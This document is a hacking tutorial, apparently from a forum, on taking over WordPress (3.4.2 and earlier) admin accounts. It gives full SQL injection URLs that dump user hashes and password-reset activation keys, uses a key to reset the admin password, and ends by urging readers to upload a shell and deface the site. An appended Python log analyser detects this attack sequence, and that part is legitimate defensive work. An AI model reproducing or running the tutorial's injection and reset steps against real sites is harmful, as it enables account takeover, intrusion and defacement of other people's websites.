As we all know, WordPress blogs now use a stronger algorithm to hash blog passwords, and these hashes are not easy to crack. The only method to crack these hashes is brute force, but brute force takes too much time.
Now let's get started --->
Things you need --->
1. WordPress version <= 3.4.2
2. SQL injection vulnerable WordPress site (make sure the version of the WP site is 3.4.2 or lower)
Let's start --->
Find an SQLi vulnerable WordPress site.
For example, I get www.site.com?fbconnect_action=myhome&fbuserid=1
Now add this code after the WordPress site address:
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
Now the address will look like:
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
Let's start pwning.
First go to http://target.com/wp-login.php
Now click on Lost your password ?
Now WordPress will ask you for the username or email; enter the username or email ID which you got in the field and click get password.
Now it will say "Check your e-mail for the confirmation link."
What WordPress does now is send an activation key to the email address, and it also sets the value of the activation key in the database.
We will get the user activation key through SQLi; this is what it's all about.
Add the column name user_activation_key to extract it:
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
Now you will be able to see the activation key.
Now, finally, all we have to do is add the following URL to the end of the site address and edit it with your activation key and username:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
e.g. http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
Now WordPress will ask you for your new password; enter your desired password and click change.
Now upload shell and then deface it.
Note -->
1. Only for educational purposes.
2. This hack only works on WordPress versions 3.4.2 or lower.
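
From the defender's side, the request sequence described above shows up in the web server access log. The following is an added example, not part of the original post: it flags clients that send a UNION SELECT naming the WordPress user table or its sensitive columns, and escalates when the same client then redeems a reset key at wp-login.php?action=rp. The log lines, IP addresses, the 30-minute window and the function names are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote_plus

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.55 - - [12/Mar/2013:09:58:41 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 5120
198.51.100.20 - - [12/Mar/2013:10:01:30 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.7 - - [12/Mar/2013:10:02:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.7 - - [12/Mar/2013:10:02:40 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2013:10:03:05 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTEDKEY&login=admin HTTP/1.1" 200 2100
198.51.100.20 - - [12/Mar/2013:10:05:00 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTEDKEY2&login=alice HTTP/1.1" 200 2100
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3}')
# UNION SELECT that names the WordPress user table (default wp_ prefix) or its
# sensitive columns; the column names still match on sites with a custom prefix.
SQLI = re.compile(
    r"union\s+(?:all\s+)?select\b.*\b(?:wp_users|user_pass|user_activation_key)\b",
    re.I | re.S)
WINDOW = timedelta(minutes=30)  # assumed correlation window

def is_reset_use(url):
    """True for wp-login.php?action=rp&key=... (a reset key being redeemed)."""
    path, _, query = url.partition("?")
    params = parse_qs(query)
    return (path.endswith("/wp-login.php")
            and params.get("action") == ["rp"] and "key" in params)

def analyze(log_text):
    """Return {ip: verdict} with verdict 'sqli-only' or 'sqli-then-reset'."""
    last_sqli, verdicts = {}, {}
    for line in log_text.splitlines():  # assumes lines are in time order
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, url = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if SQLI.search(unquote_plus(url)):  # decode + and %xx before matching
            last_sqli[ip] = when
            verdicts.setdefault(ip, "sqli-only")
        elif (is_reset_use(url) and ip in last_sqli
              and timedelta(0) <= when - last_sqli[ip] <= WINDOW):
            verdicts[ip] = "sqli-then-reset"
    return verdicts

if __name__ == "__main__":
    for ip, verdict in analyze(SAMPLE_LOG).items():
        print(ip, verdict)
```

A "sqli-then-reset" verdict means the affected account's password should be treated as changed by someone other than its owner; the ordinary reset by 198.51.100.20 is not flagged because no injection request precedes it.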